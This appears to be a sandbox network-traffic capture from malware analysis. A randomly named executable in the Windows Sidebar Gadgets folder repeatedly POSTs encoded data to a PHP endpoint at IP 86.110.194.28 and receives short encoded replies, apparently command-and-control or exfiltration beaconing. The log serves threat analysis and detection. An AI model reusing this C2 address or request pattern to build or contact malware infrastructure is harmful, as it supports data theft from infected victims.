                                                                                                                                                                  Jan 3, 2025 09:07:55.175259113 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  38192.168.2.44978086.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:55.435167074 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2140
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:55.789875984 CET2140OUTData Raw: 5b 56 5b 5b 5d 5b 50 50 54 5b 59 5a 5b 56 57 53 5f 51 5a 54 52 5d 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [V[[][PPT[YZ[VWS_QZTR]PF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&<1["U2<B(8"[04-1?)!!+?'7'V<#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:07:56.121201038 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:56.250076056 CET380INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:56 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 24 13 25 2b 2e 5a 3d 3f 2f 1d 25 23 32 03 21 20 33 05 2f 0e 3a 44 22 3c 3e 00 31 3b 3b 09 2b 04 2d 1b 29 33 0f 55 37 58 3d 54 28 30 28 5d 03 10 39 11 28 03 2b 5a 2a 3d 2a 06 2e 19 3c 02 24 51 3f 00 3d 0a 3d 50 32 3f 3e 56 36 13 2f 1f 29 33 0b 13 27 05 24 5e 3c 33 23 5b 27 3d 20 54 0b 17 27 1d 33 20 24 06 26 2b 35 10 3d 27 30 5b 24 04 0f 50 35 3f 31 09 37 39 27 03 2d 23 39 57 24 5e 25 56 3e 00 30 0b 24 2a 0f 03 24 2b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: $%+.Z=?/%#2! 3/:D"<>1;;+-)3U7X=T(0(]9(+Z*=*.<$Q?==P2?>V6/)3'$^<3#['= T'3 $&+5='0[$P5?179'-#9W$^%V>0$*$+.\#(U4WP


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  39192.168.2.44978186.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:55.925221920 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:56.270243883 CET2576OUTData Raw: 5b 5d 5e 58 58 5c 55 5a 54 5b 59 5a 5b 52 57 52 5f 55 5a 5e 52 52 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: []^XX\UZT[YZ[RWR_UZ^RRP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&(-!\69?%0*+6Y$B%&5P579 (3$)'0/(#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:07:56.627769947 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:56.762067080 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:56 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  40192.168.2.44978386.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:56.882143021 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:57.238661051 CET2576OUTData Raw: 5b 53 5b 5b 58 5a 50 5d 54 5b 59 5a 5b 52 57 5f 5f 57 5a 5f 52 53 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [S[[XZP]T[YZ[RW__WZ_RSPG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%<!_#*32Z D)2^0\%<% $& ($\''$'+)#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:07:57.566042900 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:57.698079109 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:57 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  41192.168.2.44978986.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:57.836497068 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:58.192090034 CET2576OUTData Raw: 5b 5c 5b 5d 5d 5c 55 5a 54 5b 59 5a 5b 51 57 5f 5f 52 5a 55 52 5d 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [\[]]\UZT[YZ[QW__RZUR]PF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%?1^!:S%$E=+04\&Y)"B%P7;039$B$<$U()#Y'$X.9
                                                                                                                                                                  Jan 3, 2025 09:07:58.525327921 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:58.654078007 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:58 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  42192.168.2.44979986.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:58.796608925 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2564
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:59.146219015 CET2564OUTData Raw: 5b 56 5e 5c 58 5b 50 50 54 5b 59 5a 5b 57 57 5b 5f 5c 5a 5f 52 52 50 48 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [V^\X[PPT[YZ[WW[_\Z_RRPH_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&B(.1\";&,#*)0'!\'? 4 ;,]':8&/V?#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:07:59.482178926 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:59.609999895 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:59 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  43192.168.2.44980686.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:59.740391970 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:00.098030090 CET2576OUTData Raw: 5b 5c 5b 5c 58 59 55 58 54 5b 59 5a 5b 50 57 5d 5f 51 5a 59 52 51 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [\[\XYUXT[YZ[PW]_QZYRQP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%()]5,W%<'>.X3$\&/=5*#^,$$B&, ?9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:00.426891088 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:00.556009054 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:00 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  44192.168.2.44981286.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:00.678788900 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:01.035653114 CET2576OUTData Raw: 5b 5d 5b 5f 58 58 50 5b 54 5b 59 5a 5b 55 57 52 5f 56 5a 5d 52 54 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [][_XXP[T[YZ[UWR_VZ]RTPF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%+=-Z690V1?<>;6%4*1Y%S5$>7;,$*+$/;(#Y'$X.)


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  45192.168.2.44981386.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:01.291289091 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:01.644948006 CET2164OUTData Raw: 5e 56 5e 5f 5d 59 55 5a 54 5b 59 5a 5b 5f 57 53 5f 52 5a 5b 52 52 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^V^_]YUZT[YZ[_WS_RZ[RRPG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&@<6!\02Z$C(;3&%/%"7:#(4X$$<$))#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:01.979612112 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:02.111846924 CET380INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:01 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 24 5d 31 2b 22 13 29 2f 02 00 32 0d 25 58 22 33 3c 5c 2c 30 2a 0b 21 2c 3a 02 25 15 05 08 2b 13 0c 09 3f 1d 3d 56 37 00 2d 1f 3f 1a 28 5d 03 10 3a 01 28 2e 2c 02 28 2e 35 5e 39 27 3b 5c 27 37 01 05 3d 55 39 13 31 02 04 1d 21 5b 30 0a 3d 33 29 13 26 3b 3f 06 28 30 30 06 27 17 20 54 0b 17 27 57 27 20 01 5f 26 2b 3d 10 2a 37 27 04 33 04 2e 0e 35 3c 35 09 20 2a 3f 05 2f 20 3e 0f 25 38 0b 55 3e 3e 2b 54 25 04 04 5c 30 3b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: $]1+")/2%X"3<\,0*!,:%+?=V7-?(]:(.,(.5^9';\'7=U91![0=3)&;?(00' T'W' _&+=*7'3.5<5 *?/ >%8U>>+T%\0;.\#(U4WP


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  46192.168.2.44981886.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:01.503454924 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:01.848066092 CET2576OUTData Raw: 5b 50 5b 5b 5d 5a 50 5d 54 5b 59 5a 5b 53 57 5f 5f 54 5a 5c 52 5d 50 44 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [P[[]ZP]T[YZ[SW__TZ\R]PD_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%?>""'1<8=8*39%?"B94+ \0#0;<#Y'$X.1
                                                                                                                                                                  Jan 3, 2025 09:08:02.214308977 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:02.346234083 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:02 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  47192.168.2.44982586.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:02.474680901 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2564
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:02.832442999 CET2564OUTData Raw: 5e 55 5b 5a 58 5b 55 58 54 5b 59 5a 5b 57 57 5b 5f 56 5a 58 52 51 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^U[ZX[UXT[YZ[WW[_VZXRQPC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%(.)!\'1,0@)]*^07=2?9S5$"4;(':(A$? W<)#Y'$X.)
                                                                                                                                                                  Jan 3, 2025 09:08:03.181154966 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:03.313182116 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:03 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  48192.168.2.44983186.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:03.447108030 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:03.816484928 CET2576OUTData Raw: 5b 51 5e 59 58 5f 55 5b 54 5b 59 5a 5b 50 57 5b 5f 51 5a 5c 52 56 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [Q^YX_U[T[YZ[PW[_QZ\RVP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%()58V2Z<@=;60$.%Y6"$: 0X39'3,W<)#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:04.237641096 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:04.373054028 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:04 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  49192.168.2.44983786.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:04.515244961 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
